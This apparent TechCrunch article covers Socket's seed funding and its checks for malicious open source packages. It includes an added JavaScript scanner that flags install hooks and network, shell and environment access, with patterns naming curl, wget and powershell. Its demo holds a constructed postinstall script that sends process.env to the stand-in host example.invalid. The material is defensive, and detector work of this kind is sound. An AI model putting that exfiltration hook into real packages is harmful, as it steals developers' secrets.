Socket lands $4.6 million to audit and intercept malicious open source code – TechCrunch


Securing the software supply chain is admittedly a dry topic, but knowing which components and code go into the software behind everyday devices and appliances is a critical part of a development process that billions of people rely on every day.

Software is like any other product you build and ship: it is assembled from components that others have built, often in the form of source code, and those components have to be checked so that they do not break the end product or introduce weaknesses that compromise it. Most of the world’s software relies on open source code written by developers who publish their work for anyone to use. That also means trusting that those developers will always act in good faith. But projects are being abandoned and taken over by others who plant backdoors or malware, and, as seen since Russia’s invasion of Ukraine, there has been an increase in “protestware”, in which open source developers change their own code to erase the contents of Russian computers in protest against the Kremlin’s incursion.

Feross Aboukhadijeh, a prolific open source maintainer and the founder of Socket, told TechCrunch on a recent call that development teams often place too much faith in open source code, which can be disastrous if a deliberately introduced vulnerability enters the supply chain and goes undetected.

Software is generally easier to fix than self-driving cars and other hardware that has to be recalled, but the consequences of a software compromise can still be disastrous and widespread. Corrupted software updates have led to the massive compromise of US federal government networks, to ransomware attacks, and to the targeting of corporate password managers to steal sensitive company secrets.

Aboukhadijeh founded Socket earlier this year alongside a team of fellow open source maintainers who have seen firsthand some of the worst software supply chain attacks in the wild. The team set out to build an app that developers can use to detect and block the introduction of potentially malicious code into their projects from the millions of open source code repositories they may draw on.

The app connects to a developer’s GitHub account and runs dozens of checks for known package issues, including potentially suspicious code changes: for example, if an open source package you depend on suddenly starts trying to communicate over the network or gain shell access, which may indicate that the package has been compromised.

Aboukhadijeh described Socket as offering a nutrition label for an open source package’s capabilities, illuminating the package’s access, permissions and behaviors, such as install scripts, that many kinds of malware use to install themselves on a victim’s system.

“We can’t tell you for sure if a package talking to the network is a bad sign or not, because what if it’s a web server – then obviously it’s going to have to!” Aboukhadijeh said. But having this visibility built into the software build process is what developers need to prevent a supply chain attack. “It’s not a complicated AI or machine learning thing,” he said of his own product. “There is no way to hide that a package is running an install script; it is declared as part of the package. So why not bring this to the attention of a developer?”
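To make the idea concrete, here is a small JavaScript capability scanner in the spirit of the “nutrition label” described above. It is an added illustration written for this page, not Socket’s code, and it makes no claim about how Socket implements its checks. It reads an npm package’s package.json for install-time lifecycle hooks, scans the package’s source files for imports and patterns that grant network, shell, filesystem, environment or eval access, and then diffs two versions to show what a package has newly gained. The hook names, the core-module lists, the package name left-trim, the file setup.js and the host example.invalid are all constructed for the example. Matching on regular expressions is a heuristic; a production tool would parse the source into an AST and follow dynamic requires.

```javascript
// Added example, not Socket's code: derive a capability "label" for an npm
// package from its package.json and source files, then diff two versions to
// surface capabilities the package did not have before. All inputs are constructed.

// npm lifecycle hooks that run on a consumer's machine at install time (assumed list).
const LIFECYCLE_SCRIPTS = ["preinstall", "install", "postinstall"];

// Node core modules whose import grants a capability (assumed mapping).
const MODULE_CAPABILITIES = {
  network: ["http", "https", "net", "dns", "tls", "dgram", "http2"],
  shell: ["child_process"],
  filesystem: ["fs", "fs/promises"],
};

// Source patterns that grant a capability without a core-module import.
const PATTERN_CAPABILITIES = {
  network: [/\bfetch\s*\(/, /\bXMLHttpRequest\b/],
  environment: [/\bprocess\.env\b/],
  eval: [/\beval\s*\(/, /\bnew\s+Function\s*\(/],
};

// Shell commands in an install hook that download or execute arbitrary code.
const RISKY_COMMAND = /\b(?:curl|wget|sh\s+-c|bash\s+-c|powershell)\b/;

// Collect module specifiers from require("x"), import ... from "x" and
// import("x"); a "node:" prefix is stripped so "node:https" counts as https.
function importedModules(source) {
  const re = /(?:\brequire\s*\(|\bfrom|\bimport\s*\()\s*['"](?:node:)?([^'"]+)['"]/g;
  return new Set([...source.matchAll(re)].map((m) => m[1]));
}

// Capabilities granted by one source file.
function fileCapabilities(source) {
  const caps = new Set();
  const mods = importedModules(source);
  for (const [cap, names] of Object.entries(MODULE_CAPABILITIES)) {
    if (names.some((n) => mods.has(n))) caps.add(cap);
  }
  for (const [cap, patterns] of Object.entries(PATTERN_CAPABILITIES)) {
    if (patterns.some((p) => p.test(source))) caps.add(cap);
  }
  return caps;
}

// pkg: parsed package.json; files: { "relative/path.js": source text }
function labelPackage(pkg, files) {
  const scripts = pkg.scripts || {};
  const installScripts = LIFECYCLE_SCRIPTS.filter((hook) => hook in scripts)
    .map((hook) => ({ hook, command: scripts[hook] }));

  const capabilities = {};
  for (const [path, source] of Object.entries(files)) {
    for (const cap of fileCapabilities(source)) {
      if (!capabilities[cap]) capabilities[cap] = [];
      capabilities[cap].push(path);
    }
  }

  // What runs at install time: the hook command itself plus any package file it names.
  const installTime = new Set();
  for (const { command } of installScripts) {
    if (RISKY_COMMAND.test(command)) installTime.add("shell");
    for (const token of command.split(/\s+/)) {
      const path = token.replace(/^\.\//, "");
      if (path in files) fileCapabilities(files[path]).forEach((c) => installTime.add(c));
    }
  }
  return {
    name: pkg.name, version: pkg.version, installScripts, capabilities,
    installTimeCapabilities: [...installTime].sort(),
  };
}

// Capabilities present in the new label but absent from the old one.
function newlyGained(oldLabel, newLabel) {
  const gained = Object.keys(newLabel.capabilities)
    .filter((cap) => !(cap in oldLabel.capabilities));
  if (newLabel.installScripts.length > 0 && oldLabel.installScripts.length === 0) {
    gained.push("install-script");
  }
  return gained.sort();
}

// Constructed sample: 1.2.0 is a plain string helper; 1.2.1 adds a postinstall
// hook whose script reads the environment and posts it over HTTPS.
const INDEX_JS = "module.exports = (s) => s.replace(/^\\s+/, '');\n";
function demo() {
  const v120 = labelPackage({ name: "left-trim", version: "1.2.0" }, { "index.js": INDEX_JS });
  const v121 = labelPackage(
    { name: "left-trim", version: "1.2.1", scripts: { postinstall: "node ./setup.js" } },
    {
      "index.js": INDEX_JS,
      "setup.js":
        "const https = require('node:https');\n" +
        "const body = JSON.stringify(process.env);\n" +
        "https.request({ host: 'example.invalid', method: 'POST' }).end(body);\n",
    }
  );
  return { v120, v121, gained: newlyGained(v120, v121) };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run with `node` and the diff between the two labels reports environment, install-script and network as newly gained, with environment and network reachable at install time. That combination, a new install hook running code that reads secrets and talks to the network, is exactly the signal the article describes: not proof of malice on its own, but a change a developer should be asked to look at before the update lands.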

Socket is still in its infancy and is entering a crowded market, but it is already attracting investment. The early-stage startup has raised $4.6 million in seed funding from more than a dozen angel investors and security executives, including former GitHub CEO Nat Friedman and Keybase co-founder Max Krohn, as well as Unusual Ventures, Village Global and South Park Commons.

Aboukhadijeh told TechCrunch the funding will help expand the startup’s engineering, security analytics, and research teams to develop its tools for developers.
